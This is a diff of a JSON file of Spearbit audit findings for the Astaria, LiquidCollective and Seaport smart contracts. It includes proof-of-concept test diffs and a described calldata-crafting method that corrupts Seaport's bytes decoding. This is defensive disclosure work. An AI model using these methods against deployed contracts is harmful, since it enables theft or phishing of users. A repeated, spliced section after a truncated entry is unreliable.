If the epoch is over, this calls processEpoch(). Otherwise, it calls transferWithdrawReserve(). function _beforeCommitToLien( IAstariaRouter.Commitment calldata params, address receiver ) internal virtual override(VaultImplementation) { VaultData storage s = _loadStorageSlot(); if (timeToEpochEnd() == uint256(0)) { processEpoch(); } else if (s.withdrawReserve > uint256(0)) { transferWithdrawReserve(); } } However, the processEpoch() function will fail if the withdraw reserves haven't been transferred. In this case, it would require the user to manually call transferWithdrawReserve() to fix things, and then request their lien again. Instead, the protocol should transfer the reserves whenever it is needed, and only then call processEpoch().", + "title": "Remove unused imports from code", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "There are unused imports across the codebase. If they are not used inside a contract, it would be better to remove them to avoid confusion.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Remove owner() variable from withdraw proxies", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When a withdrawProxy is deployed, it is created with certain immutable arguments. Two of these values are owner() and vault(), and they will always be equal. They seem to be used interchangeably on the withdraw proxy itself, so they should be consolidated into one variable.", + "title": "Missing event emission in critical functions, init functions and setters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Some critical functions, like a contract's constructor, a contract's init*(...) function (upgradable contracts), and some setters or other critical functions, are missing event emission. Event emissions are very useful for external web3 applications, but also for monitoring the usage and security of your protocol when paired with external monitoring tools. Note: in the init*(...)/constructor function, consider whether to add a general broad event like ContractInitialized or to split it into more specific events like QuorumUpdated+OwnerChanged+... Note: in general, consider adding an event emission to all the init*(...) functions used to initialize the upgradable contracts, passing to the event the relevant args in addition to the version of the upgrade.
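As a sketch (the event names and the init signature here are illustrative, not the project's API):

event ContractInitialized(uint256 version);
event QuorumUpdated(uint256 newQuorum);

function initOracleV1(address _riverAddress, uint256 _quorum) external {
    // ... existing initialization logic ...
    emit ContractInitialized(1);  // version of this upgrade
    emit QuorumUpdated(_quorum);  // one specific event per relevant argument
}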
", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Unnecessary checks in _validateCommitment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In _validateCommitment(), we check to confirm that the sender of the message is adequately qualified to be making the decision to take a lien against the collateral (i.e. they are the holder, the operator, etc). However, the way this is checked is somewhat roundabout and can be substantially simplified. For example, we check require(operator == receiver); in a block that is only triggered if we've already validated that receiver != operator.", + "title": "The spent offer amounts provided to OrderFulfilled for collection of (advanced) orders is not the actual amount spent in general", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When Seaport is called to fulfill or match a collection of (advanced) orders, OrderFulfilled is emitted before applying fulfillments and executing transfers. The offer and consideration items have the following forms: C = (It, T, i, acurr, R, acurr) and O = (It, T, i, acurr, acurr), where It is the itemType, T the token, i the identifier, acurr the interpolation of startAmount and endAmount depending on the time and the fraction of the order, R the consideration item's recipient, O an offer item, and C a consideration item. The SpentItem and ReceivedItem structs provided to the OrderFulfilled event ignore the last component of the offer/consideration items in the above form, since they are redundant. Seaport enforces that all consideration items are used. But for the endpoints in this context, we might end up with offer items with only a portion of their amounts being spent. So in the end O.acurr might not be the amount spent for this offer item, yet OrderFulfilled emits O.acurr as the amount spent. This can cause discrepancies in off-chain bookkeeping by agents listening for this event. fulfillOrder and fulfillAdvancedOrder do not have this issue, since all items are enforced to be used. These two endpoints also differ from the collection-of-(advanced)-orders endpoints in that they emit OrderFulfilled at the end of their call, before clearing the reentrancy guard.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Medium Risk" ] }, { - "title": "Comment or remove unused function parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Highlighted functions above take arguments which are never used. If the function has to have a particular signature, comment that argument name, otherwise remove that argument completely. Additional instances noted in Context above. LienToken.sol#L726 : LienStorage storage s input parameter is not used in _getRemainingInterest. It can be removed and this function can be pure. VaultImplementation.sol#L341 : incoming is not used in buyoutLien, was this variable meant to be used?", + "title": "The spent offer item amounts shared with a zone for restricted (advanced) orders or with a contract offerer for orders of CONTRACT order type is not the actual spent amount in general", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When Seaport is called to fulfill or match a collection of (advanced) orders, there are scenarios where not all offer items will be used. When not all of the current amount of an offer item is used, and if this offer item belongs to an order which is either of CONTRACT order type or a restricted order (and the caller is not the zone), then the spent amount shared with either the contract offerer or the zone through their respective endpoints (validateOrder for zones and ratifyOrder for contract offerers) does not reflect the actual amount spent.
When Seaport is called through one of its more complex endpoints to match or fulfill orders, the offer items go through a few phases. Using the notation It = itemType, T = token, i = identifier, as = startAmount, ae = endAmount, acurr = the interpolation of startAmount and endAmount depending on the time and the fraction of the order, and O = offer item: let's assume an offer item is originally O = (It, T, i, as, ae). In _validateOrdersAndPrepareToFulfill, O gets transformed into (It, T, i, acurr, acurr). Then, depending on whether the order is part of a match (1, 2, 3) or fulfillment (1, 2) order and whether there is corresponding fulfillment data pointing at this offer item, it might transform into (It, T, i, b, acurr) where b ∈ [0, ∞). For fulfilling a collection of orders, b ∈ {0, acurr} depending on whether the offer item gets used or not, but for match orders it can be in the more general range b ∈ [0, ∞). And finally, for restricted or CONTRACT order types, before calling _assertRestrictedAdvancedOrderValidity the offer item would be transformed into (It, T, i, acurr, acurr). So the startAmount of an offer item goes through the following flow: as → acurr → b ∈ [0, ∞) → acurr. And at the end, acurr is the amount used when Seaport calls into the validateOrder of a zone or the ratifyOrder of a contract offerer. acurr does not reflect the actual amount that this offer item has contributed to a combined amount used for an execution transfer.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Medium Risk" ] }, { - "title": "Zero address check can never fail", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The details.borrower != address(0) check will never be false in the current system, as AstariaRouter.sol#L352-L354 will revert when ownerOf is address(0).", + "title": "Empty criteriaResolvers for criteria-based contract orders", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "There is a deviation in how criteria-based items are resolved for contract orders. For contract orders which have offers with criteria, the _compareItems function checks that the contract offerer returned a corresponding non-criteria-based itemType when identifierOrCriteria for the original item is 0, i.e., offering from an entire collection. Afterwards, the orderParameters.offer array is replaced by the offer array returned by the contract offerer. For other criteria-based orders, such as offers with identifierOrCriteria = 0, the itemType of the order is only updated during the criteria resolution step. This means that for such offers there should be a corresponding CriteriaResolver struct.
See the following test: modified test/advanced.spec.ts @@ -3568,9 +3568,8 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () {
   // Seller approves marketplace contract to transfer NFTs
   await set1155ApprovalForAll(seller, marketplaceContract.address, true);
-  const { root, proofs } = merkleTree([nftId]);
-  const offer = [getTestItem1155WithCriteria(root, toBN(1), toBN(1))];
+  const offer = [getTestItem1155WithCriteria(toBN(0), toBN(1), toBN(1))];
   const consideration = [ getItemETH(parseEther(\"10\"), parseEther(\"10\"), seller.address),
@@ -3578,8 +3577,9 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () {
   getItemETH(parseEther(\"1\"), parseEther(\"1\"), owner.address), ];
+  // Replacing by `const criteriaResolvers = []` will revert
   const criteriaResolvers = [
-    buildResolver(0, 0, 0, nftId, proofs[nftId.toString()]),
+    buildResolver(0, 0, 0, nftId, []),
   ];
   const { order, orderHash, value } = await createOrder(
However, in case of contract offers with identifierOrCriteria = 0, Seaport 1.2 does not expect a corresponding CriteriaResolver struct and will revert if one is provided, as the itemType was updated to be the corresponding non-criteria-based itemType. See advanced.spec.ts#L510 for a test case. Note: this also means that the fulfiller cannot explicitly provide the identifier when a contract order is being fulfilled. A malicious contract may use this to their advantage. For example, assume that a contract offerer in Seaport only accepts criteria-based offers. The fulfiller may first call previewOrder where the criteria is always resolved to a rare NFT, but the actual execution would return an uninteresting NFT. If such offers also required a corresponding resolver (similar behaviour as regular criteria-based orders), then this could be fixed by explicitly providing the identifier--akin to a slippage check. In short, for regular criteria-based orders with identifierOrCriteria = 0, the fulfiller can pick which identifier to receive by providing a CriteriaResolver (as long as it's valid). For contract orders, fulfillers don't have this option and contracts may be able to abuse this.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Medium Risk" ] }, { - "title": "UX differs between Router.commitToLiens and VaultImplementation.commitToLien", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The Router function creates the Collateralized Token, while the VaultImplementation requires the collateral owner to ERC721.safeTransferFrom to the CollateralToken contract prior to calling.", + "title": "Advance orders of CONTRACT order types can generate orders with fewer consideration items that would break the aggregation routine", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When Seaport gets a collection of advanced orders to fulfill or match, if one of the orders has a CONTRACT order type, Seaport calls the generateOrder(...) endpoint of that order's offerer. generateOrder(...) can provide fewer consideration items for this order. So the total number of consideration items might be less than the ones provided by the caller. But since the caller would need to provide the fulfillment data beforehand to Seaport, they might use indices that turn out to be out of range for the consideration in question after the modification applied for the contract offerer above (see the sketch below).
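To make the failure mode concrete, here is a sketch of a contract offerer that trims its consideration array (a hypothetical contract; the generateOrder signature follows Seaport 1.2's ContractOffererInterface, and the import path is illustrative):

import { SpentItem, ReceivedItem } from \"./lib/ConsiderationStructs.sol\";

contract TrimmingOfferer {
    function generateOrder(
        address /* fulfiller */,
        SpentItem[] calldata minimumReceived,
        SpentItem[] calldata maximumSpent,
        bytes calldata /* context */
    ) external returns (SpentItem[] memory offer, ReceivedItem[] memory consideration) {
        offer = minimumReceived;
        // return a single consideration item: any caller-provided fulfillment
        // component referencing consideration index 1+ of this order is now out of range
        consideration = new ReceivedItem[](1);
        SpentItem calldata m = maximumSpent[0];
        consideration[0] = ReceivedItem(m.itemType, m.token, m.identifier, m.amount, payable(address(this)));
    }
}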
If this happens, the whole call will be reverted. This issue is in the same category as Advance orders of CONTRACT order types can generate orders with different consideration recipients that would break the aggregation routine.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Medium Risk" ] }, { - "title": "Document what vaults are listed by Astaria", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Anyone can call newPublicVault with epochLength in the correct range to create a public vault.", + "title": "AdvancedOrder.numerator and AdvancedOrder.denominator are unchecked for orders of CONTRACT order type", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "For most advanced order types, we have the following check: // Read numerator and denominator from memory and place on the stack. uint256 numerator = uint256(advancedOrder.numerator); uint256 denominator = uint256(advancedOrder.denominator); // Ensure that the supplied numerator and denominator are valid. if (numerator > denominator || numerator == 0) { _revertBadFraction(); } For CONTRACT order types this check is skipped. For later calculations (calculating the current amount) Seaport uses the numerator and denominator returned by _getGeneratedOrder, which as a pair is either (1, 1) or (0, 0). advancedOrder.numerator is only used to skip certain operations in some loops when it is 0: skip applying criteria resolvers; skip aggregating the amount for executions; skip the final validity check. Skipping the above operations would make sense. But when, for an advancedOrder with CONTRACT order type, _getGeneratedOrder returns (h, 1, 1) and advancedOrder.numerator == 0, we would skip applying criteria resolvers, skip aggregating the amounts from offer or consideration amounts for this order, and skip the final validity check that would call into the ratifyOrder endpoint of the offerer. But emitting the following OrderFulfilled will not be skipped, even though this advancedOrder will not be used: // Emit an OrderFulfilled event. _emitOrderFulfilledEvent( orderHash, orderParameters.offerer, orderParameters.zone, recipient, orderParameters.offer, orderParameters.consideration ); This can create discrepancies between what happens on-chain and what off-chain agents index/record.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Medium Risk" ] }, { - "title": "Simplify nested if/else blocks in for loops", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "There are quite a few instances where nested if/else blocks are used in for loops and that is the only block in the for loop: for ( ... ) { if (<condition>) { ... } else if (<condition>) { ... } ... else if (<condition>) { ... } else { revert CustomError(); } }", + "title": "Calls to PausableZone's executeMatchAdvancedOrders and executeMatchOrders would revert if unused native tokens would need to be returned", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In match (advanced) orders, one can provide native tokens as offer and consideration items. So a PausableZone would need to provide msg.value to call the corresponding Seaport endpoints.
There are a few scenarios where not all of the msg.value native token amount provided to the Seaport marketplace will be used: 1. Rounding errors in calculating the current amount of offer or consideration items. The zone can prevent sending extra native tokens to Seaport by pre-calculating these values and making sure its transaction is included in the specific block that these values were calculated for (this is important when the start and end amounts of an item are not equal). 2. The zone (un)intentionally sends more native tokens than is necessary to Seaport. 3. The (advanced) orders sent for matching in Seaport include an order of CONTRACT order type, and the offerer contract provides a different amount for at least one item, which would eventually make the whole transaction not use the full msg.value provided to it. In all these cases, since PausableZone does not have a receive or fallback endpoint to accept native tokens, when Seaport tries to send back the unused native token amount the transaction may revert. PausableZone not accepting native tokens:
$ export CODE=$(jq -r '.deployedBytecode' artifacts/contracts/zones/PausableZone.sol/PausableZone.json | tr -d '\n')
$ evm --code $CODE --value 1 --prestate genesis.json --sender 0xb4d0000000000000000000000000000000000000 --nomemory=false --debug run
$ evm --input $(echo $CODE | head -c 44 - | sed -E s/0x//) disasm
6080806040526004908136101561001557600080fd
00000: PUSH1 0x80 00002: DUP1 00003: PUSH1 0x40 00005: MSTORE 00006: PUSH1 0x04 00008: SWAP1 00009: DUP2 0000a: CALLDATASIZE 0000b: LT 0000c: ISZERO 0000d: PUSH2 0x0015 00010: JUMPI 00011: PUSH1 0x00 00013: DUP1 00014: REVERT
(The full opcode-by-opcode evm --debug trace, with its stack and memory dumps, is elided here; it simply steps through the disassembly above and ends with error: execution reverted, since a call with empty calldata fails the CALLDATASIZE check and falls through to the REVERT at offset 0x14.)
genesis.json: { \"gasLimit\": \"4700000\", \"difficulty\": \"1\", \"alloc\": { \"0xb4d0000000000000000000000000000000000000\": { \"balance\": \"10000000000000000000000000\", \"code\": \"\", \"storage\": {} } } } // file: test/zone.spec.ts ... it(\"Fulfills an order with executeMatchAdvancedOrders with NATIVE Consideration Item\", async () => { const pausableZoneControllerFactory = await ethers.getContractFactory( \"PausableZoneController\", owner ); const pausableZoneController = await pausableZoneControllerFactory.deploy( owner.address ); // Deploy pausable zone const zoneAddr = await createZone(pausableZoneController); // Mint NFTs for use in orders const nftId = await mintAndApprove721(seller, marketplaceContract.address); // Define orders const offerOne = [ getTestItem721(nftId, toBN(1), toBN(1), undefined, testERC721.address), ]; const considerationOne = [ getOfferOrConsiderationItem( 0, ethers.constants.AddressZero, toBN(0), parseEther(\"0.01\"), parseEther(\"0.01\"), seller.address ), ]; const { order: orderOne, orderHash: orderHashOne } = await createOrder( seller, zoneAddr, offerOne, considerationOne, 2 ); const offerTwo = [ getOfferOrConsiderationItem( 0, ethers.constants.AddressZero, toBN(0), parseEther(\"0.01\"), parseEther(\"0.01\"), undefined ), ]; const considerationTwo = [ getTestItem721( nftId, toBN(1), toBN(1), buyer.address, testERC721.address ), ]; const { order: orderTwo, orderHash: orderHashTwo } = await createOrder( buyer, zoneAddr, offerTwo, considerationTwo, 2 ); const fulfillments = [ [[[0, 0]], [[1, 0]]], [[[1, 0]], [[0, 0]]], ].map(([offerArr, considerationArr]) => toFulfillment(offerArr, considerationArr) ); // Perform the match advanced orders with zone const tx = await pausableZoneController .connect(owner)
This bug also applies to Seaport 1.1 and PausableZone (0x004C00500000aD104D7DBd00e3ae0A5C00560C00)", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Medium Risk" ] }, { - "title": "Document the role guardian plays in the protocol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The role of guardian is not documented.", + "title": "ABI decoding for bytes: memory can be corrupted by maliciously constructing the calldata", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In the code snippet below, size can be made 0 by maliciously crafting the calldata. In this case, the free memory is not incremented. assembly { mPtrLength := mload(0x40) let size := and( add( and(calldataload(cdPtrLength), OffsetOrLengthMask), AlmostTwoWords ), OnlyFullWordMask ) calldatacopy(mPtrLength, cdPtrLength, size) mstore(0x40, add(mPtrLength, size)) } This has two different consequences: 1. If the memory offset mPtrLength is immediately used then junk values at that memory location can be interpreted as the decoded bytes type. In the case of Seaport 1.2, the likelihood of the current free memory pointing to junk value is low. So, this case has low severity. 17 2. The consequent memory allocation will also use the value mPtrLength to store data in memory. This can lead to corrupting the initial memory data. In the worst case, the next allocation can be tuned so that the first bytes data can be any arbitrary data. To make the size calculation return 0: 1. Find a function call which has bytes as a (nested) parameter. 2. Modify the calldata field where the length of the above byte is stored to the new length 0xffffe0. 3. The calculation will now return size = 0. Note: there is an additional requirement that this bytes type should be inside a dynamic struct. Otherwise, for example, in case of function foo(bytes calldata signature) , the compiler will insert a check that calldata- size is big enough to fit signature.length. Since the value 0xffffe0 is too big to be fit into calldata, such an attack is impractical. However, for bytes type inside a dynamic type, for example in function foo(bytes[] calldata signature), this check is skipped by solc (likely because it's expensive). For a practical exploit we need to look for such function. In case of Seaport 1.2 this could be the matchAdvancedOrders(AdvancedOrder[] calldata orders, ...) function. The struct AdvancedOrder has a nested parameter bytes signature as well as bytes extraData. In the above exploit one would be able to maliciously modify the calldata in such a way that Seaport would interpret the data in extraData as the signature. Here is a proof of concept for a simplified case that showcases injecting an arbitrary value into a decoded bytes. As for severity, even though interpreting calldata differently may not fundamentally break the protocol, an attacker with enough effort may be able to use this for subtle phishing attacks or as a precursor to other attacks.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Medium Risk" ] }, { - "title": "strategistFee... 
", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Medium Risk" ] }, { - "title": "Document the role guardian plays in the protocol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The role of guardian is not documented.", + "title": "ABI decoding for bytes: memory can be corrupted by maliciously constructing the calldata", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In the code snippet below, size can be made 0 by maliciously crafting the calldata. In this case, the free memory pointer is not incremented. assembly { mPtrLength := mload(0x40) let size := and( add( and(calldataload(cdPtrLength), OffsetOrLengthMask), AlmostTwoWords ), OnlyFullWordMask ) calldatacopy(mPtrLength, cdPtrLength, size) mstore(0x40, add(mPtrLength, size)) } This has two different consequences: 1. If the memory at offset mPtrLength is immediately used, then junk values at that memory location can be interpreted as the decoded bytes type. In the case of Seaport 1.2, the likelihood of the current free memory pointing to junk values is low. So, this case has low severity. 2. The subsequent memory allocation will also use the value mPtrLength to store data in memory. This can lead to corrupting the initial memory data. In the worst case, the next allocation can be tuned so that the first bytes data can be any arbitrary data. To make the size calculation return 0: 1. Find a function call which has bytes as a (nested) parameter. 2. Modify the calldata field where the length of the above bytes is stored to the new length 0xffffe0. 3. The calculation will now return size = 0. Note: there is an additional requirement that this bytes type should be inside a dynamic struct. Otherwise, for example in the case of function foo(bytes calldata signature), the compiler will insert a check that calldatasize is big enough to fit signature.length. Since the value 0xffffe0 is too big to fit into calldata, such an attack is impractical. However, for a bytes type inside a dynamic type, for example in function foo(bytes[] calldata signature), this check is skipped by solc (likely because it's expensive). For a practical exploit we need to look for such a function. In the case of Seaport 1.2 this could be the matchAdvancedOrders(AdvancedOrder[] calldata orders, ...) function. The struct AdvancedOrder has a nested parameter bytes signature as well as bytes extraData. In the above exploit one would be able to maliciously modify the calldata in such a way that Seaport would interpret the data in extraData as the signature. Here is a proof of concept for a simplified case that showcases injecting an arbitrary value into a decoded bytes. As for severity, even though interpreting calldata differently may not fundamentally break the protocol, an attacker with enough effort may be able to use this for subtle phishing attacks or as a precursor to other attacks.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Medium Risk" ] }, { - "title": "strategistFee... have not been used can be removed from the codebase.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "strategistFeeNumerator and strategistFeeDenominator are not used except in getStrategistFee (which itself also has not been referred to by other contracts). It looks like these have been replaced by the vault fee, which gets set by public vault owners when they create the vault.", + "title": "Advance orders of CONTRACT order types can generate orders with different consideration recipients that would break the aggregation routine", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When Seaport receives a collection of advanced orders to match or fulfill, if one of the orders has a CONTRACT order type, Seaport calls the generateOrder(...) endpoint of that order's offerer. generateOrder(...) can provide new consideration item recipients for this order. These new recipients are going to be used for this order from this point on. In _getGeneratedOrder, there is no comparison between the old and new consideration recipients. The provided new recipients can create an issue when aggregating consideration items. Since the fulfillment data is provided beforehand by the caller of the Seaport endpoint, the caller might have provided fulfillment aggregation data that would have aggregated/combined one of the consideration items of this changed advanced order with another consideration item. But the aggregation had taken into consideration the original recipient of the order in question. Multiple consideration items can only be aggregated if they share the same itemType, token, identifier, and recipient (ref). The new recipients provided by the contract offerer can break this invariant and in turn cause a revert.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "redeemFutureEpoch can be called directly from a public vault to avoid using the endpoint from AstariaRouter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "One can call the redeemFutureEpoch endpoint of the vault directly to avoid the extra gas of juggling assets and multiple contract calls when using the endpoint from AstariaRouter.", + "title": "CriteriaResolvers.criteriaProof is not validated in the identifierOrCriteria == 0 case", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In the case of identifierOrCriteria == 0, the criteria resolver completely skips any validations on the Merkle proof, and in particular is missing the validation that CriteriaResolvers.criteriaProof.length == 0. Note: This is also present in Seaport 1.1 and may be a known issue.
Proof of concept: modified test/advanced.spec.ts @@ -3568,9 +3568,8 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () {
   // Seller approves marketplace contract to transfer NFTs
   await set1155ApprovalForAll(seller, marketplaceContract.address, true);
   const { root, proofs } = merkleTree([nftId]);
-  const offer = [getTestItem1155WithCriteria(root, toBN(1), toBN(1))];
+  const offer = [getTestItem1155WithCriteria(toBN(0), toBN(1), toBN(1))];
   const consideration = [ getItemETH(parseEther(\"10\"), parseEther(\"10\"), seller.address),
@@ -3578,8 +3577,9 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () {
   getItemETH(parseEther(\"1\"), parseEther(\"1\"), owner.address), ];
+  // Add a junk criteria proof and the test still passes
   const criteriaResolvers = [
-    buildResolver(0, 0, 0, nftId, proofs[nftId.toString()]),
+    buildResolver(0, 0, 0, nftId, [\"0xdead000000000000000000000000000000000000000000000000000000000000\"]),
   ];
   const { order, orderHash, value } = await createOrder(", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "Remove unused imports", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "If an imported file is not used, it can be removed. LienToken.sol#L24 : since Base64 is only imported in this file, if not used it can be removed from the codebase.", + "title": "Calls to TypehashDirectory will be successful", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "TypehashDirectory's deployed bytecode starts with 00, which corresponds to the STOP opcode (SSTORE2 also uses this pattern). This choice for the first byte causes accidental calls to the contract to succeed silently.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "Reduce nesting by reverting early", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Code following this pattern: if (<condition>) { <body> } else { revert(); } can be simplified to remove nesting using custom errors: if (!<condition>) { revert(); } <body> or, if using require statements, it can be transformed into: require(<condition>); <body>", + "title": "_isValidBulkOrderSize does not perform the signature length validation correctly.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In _isValidBulkOrderSize the signature's length validation is performed as follows: let length := mload(signature) validLength := and( lt(length, BulkOrderProof_excessSize), lt(and(sub(length, BulkOrderProof_minSize), AlmostOneWord), 2) ) The sub opcode in the above snippet wraps around.
If this were the correct formula, then it would actually simplify to: lt(and(sub(length, 3), AlmostOneWord), 2) Both the simplified and the current version would allow length to also be 3, 4, 35, 36, 67, 68, but _isValidBulkOrderSize actually needs to check that the length l has the following form: l = 67 + x + 32·y, where x ∈ {0, 1} and y ∈ {1, 2, ..., 24} (y represents the height/depth of the bulk order).
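A corrected check could look as follows (a sketch; the bounds assume a minimum size of 99 = 64 + 3 + 32 and a maximum of 836 = 65 + 3 + 32·24, which should be double-checked against the BulkOrderProof_* constants):

// valid iff length = 67 + x + 32 * y with x in {0, 1} and y in [1, 24]
validLength := and(
    // range check: 99 <= length <= 836
    and(gt(length, 98), lt(length, 837)),
    // residue check: (length - 67) mod 32 must be 0 or 1
    lt(and(sub(length, 67), AlmostOneWord), 2)
)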
However, in the case of contract orders, this is not the case. It is simply the current nonce of the offerer, combined with the address. This cannot be used to uniquely track an order on-chain. uint256 contractNonce; unchecked { contractNonce = _contractNonces[offerer]++; } assembly { orderHash := or(contractNonce, shl(0x60, offerer)) } Here are some example scenarios where this can be problematic: Scenario 1: A reverted contract order and the adjacent succeeding contract order will have the same order hash, regardless of whether they correspond to the same order. 1. Consider Alice calling fulfillAdvancedOrder for a contract order with offerer = X, where X is a smart contract that offers contract orders on Seaport 1.2. Assume that this transaction failed because enough gas was not provided for the generateOrder call. This tx would revert with a custom error InvalidContractOrder, generated from OrderValidator.sol#L391. 2. Consider Bob calling fulfillAdvancedOrder for a different contract order with offerer = X, the same smart contract offerer. This order will succeed and emit the OrderFulfilled event from OrderFulfiller.sol#L124. In the above scenario, there are two different orders, one that reverted on-chain and the other that succeeded, both having the same orderHash despite the orders only sharing the same contract offerer--the other parameters can be completely arbitrary. Scenario 2: Contract order hashes computed off-chain can be misleading. 1. Consider Alice calling fulfillAdvancedOrder for a contract order with offerer = X, where X is a smart contract that offers contract orders on Seaport 1.2. Alice computed the orderHash of their order off-chain by simulating the transaction, sends the transaction, and polls the OrderFulfilled event with the same orderHash to know if the order has been fulfilled. 2. Consider Bob calling fulfillAdvancedOrder for any contract order with offerer = X, the same smart contract offerer. 3. Bob's transaction gets included first. An OrderFulfilled event is emitted, with the orderHash being the same hash that Alice computed off-chain! Alice may believe that their order succeeded. Note: for non-contract orders, the above approach would be valid, i.e., one may generate and sign an order, compute the order hash of the order off-chain, and poll for an OrderFulfilled event with that order hash to know that it was fulfilled. Note: even though there is an easier way to track if the order succeeded in these cases, in the general case, Alice or Bob need not be the one executing the orders on-chain. And an off-chain agent may send misleading notifications to either party that their order succeeded due to this quirk with contract order hashes.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "tokenURI should revert on non-existing tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "As per the ERC721 standard, tokenURI() needs to revert if tokenId doesn't exist. The current code returns an empty string for all inputs.", + "title": "When _contractNonces[offerer] gets updated no event is emitted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When _contractNonces[offerer] gets updated, no event is emitted. This is in contrast to when a counter is updated.
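For reference, a minimal sketch of ours (mirroring the assembly above; the helper names are hypothetical) showing the packing, and how an observer could try to recover the nonce from an emitted orderHash while it still fits in 12 bytes:

function packContractOrderHash(address offerer, uint256 contractNonce)
    internal
    pure
    returns (bytes32 orderHash)
{
    assembly {
        // offerer occupies the upper 20 bytes, contractNonce the lower 12
        orderHash := or(contractNonce, shl(0x60, offerer))
    }
}

function extractContractNonce(bytes32 orderHash) internal pure returns (uint256) {
    // only meaningful while the nonce has not overflowed into the offerer bits
    return uint256(orderHash) & type(uint96).max;
}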
